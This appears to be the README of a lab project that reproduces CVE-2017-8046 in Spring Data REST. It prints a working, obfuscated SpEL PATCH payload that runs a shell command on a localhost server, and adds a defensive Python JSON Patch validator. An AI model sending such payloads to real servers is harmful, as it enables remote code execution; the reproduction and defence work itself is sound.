Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON data to run arbitrary Java code.
- Spring Data REST versions prior to 2.6.9 (Ingalls SR9) and 3.0.1 (Kay SR1)
- Spring Boot versions prior to 1.5.9 and 2.0 M6 (only if the Spring Data REST module is used)
More info: https://pivotal.io/security/cve-2017-8046
This project is a Spring Boot application with embedded Tomcat; to start it, run the main class SpringRestDataExploitExampleApplication.
To reproduce the issue, first create a user with the following POST:
```http
POST http://localhost:8080/users
Content-Type: application/json

{
  "name": "Test",
  "email": "test@test.com"
}
```
Then send this PATCH against the created resource:

```http
PATCH http://localhost:8080/users/1
Content-Type: application/json-patch+json

[{
  "op": "replace",
"path": "T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec((T(java.lang.System).getProperty(\"os.name\").toLowerCase().contains(\"win\")?\"cmd \"+T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))+\"c \":\"\")+T(java.lang.String).valueOf(new char[]{T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(112)[0],T(java.lang.Character).toChars(99)[0],T(java.lang.Character).toChars(111)[0],T(java.lang.Character).toChars(110)[0],T(java.lang.Character).toChars(102)[0],T(java.lang.Character).toChars(105)[0],T(java.lang.Character).toChars(103)[0]})).getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x",
  "value": "pwned"
}]
```
The PATCH above makes the server execute the ifconfig command and stream its output back to you in the HTTP response: the `path` field is not treated as a JSON Pointer but evaluated as a SpEL expression, which is the root cause of CVE-2017-8046.
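As an added defensive example that is not part of this project's code: a Python validator, usable in a reverse proxy or request filter in front of a vulnerable deployment, that rejects JSON Patch bodies whose `path` or `from` is not a plain RFC 6901 JSON Pointer, which is exactly the shape a SpEL payload like the one above does not have. The sample bodies are constructed for the test, not captured traffic.

```python
"""Defensive check for CVE-2017-8046-style JSON Patch bodies.

Affected Spring Data REST versions evaluated the "path" of each JSON Patch
operation as a SpEL expression. A legitimate path is an RFC 6901 JSON
Pointer: "" or a sequence of "/"-prefixed tokens, where "~" appears only
as the escape "~0" or "~1". Anything else, and in particular SpEL syntax
such as T(...), method calls or "#" variables, is rejected up front.
"""
import json
import re

# RFC 6901 grammar: json-pointer = *( "/" reference-token ).
_POINTER_RE = re.compile(r'^(?:/(?:[^/~]|~[01])*)*$')
# Stricter than RFC 6901 on purpose: these characters never occur in the
# Java property names that Spring Data REST maps pointers onto.
_SPEL_MARKERS = ("T(", "(", ")", "#", "@", "${", "new ")


def pointer_problem(path):
    """Return None if `path` is an acceptable JSON Pointer, else a reason."""
    if not isinstance(path, str):
        return "path is not a string"
    if not _POINTER_RE.match(path):
        return "path is not an RFC 6901 JSON Pointer"
    for marker in _SPEL_MARKERS:
        if marker in path:
            return f"path contains SpEL marker {marker!r}"
    return None


def check_json_patch(body):
    """Validate a raw application/json-patch+json body; return (ok, findings)."""
    try:
        ops = json.loads(body)
    except ValueError as exc:
        return False, [f"body is not JSON: {exc}"]
    if not isinstance(ops, list):
        return False, ["JSON Patch body must be an array of operations"]
    findings = []
    for i, op in enumerate(ops):
        if not isinstance(op, dict):
            findings.append(f"op {i}: not an object")
            continue
        for key in ("path", "from"):  # "from" is used by move/copy ops
            if key in op and (why := pointer_problem(op[key])):
                findings.append(f"op {i}: {key}: {why}")
    return not findings, findings


# Constructed sample bodies (hypothetical, for demonstration only).
BENIGN = '[{"op":"replace","path":"/name","value":"Alice"}]'
MALICIOUS = ('[{"op":"replace","path":"T(java.lang.System).getProperty('
             '\\"os.name\\").x","value":"pwned"}]')
```

The first finding for the malicious body is already the pointer-shape failure, so the marker list only matters for expressions that happen to start with a slash.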
A more flexible client for running your own tests is also included: the class SpringBreakCve20178046, which has its own command line. Its source code comes from https://www.exploit-db.com/exploits/44289.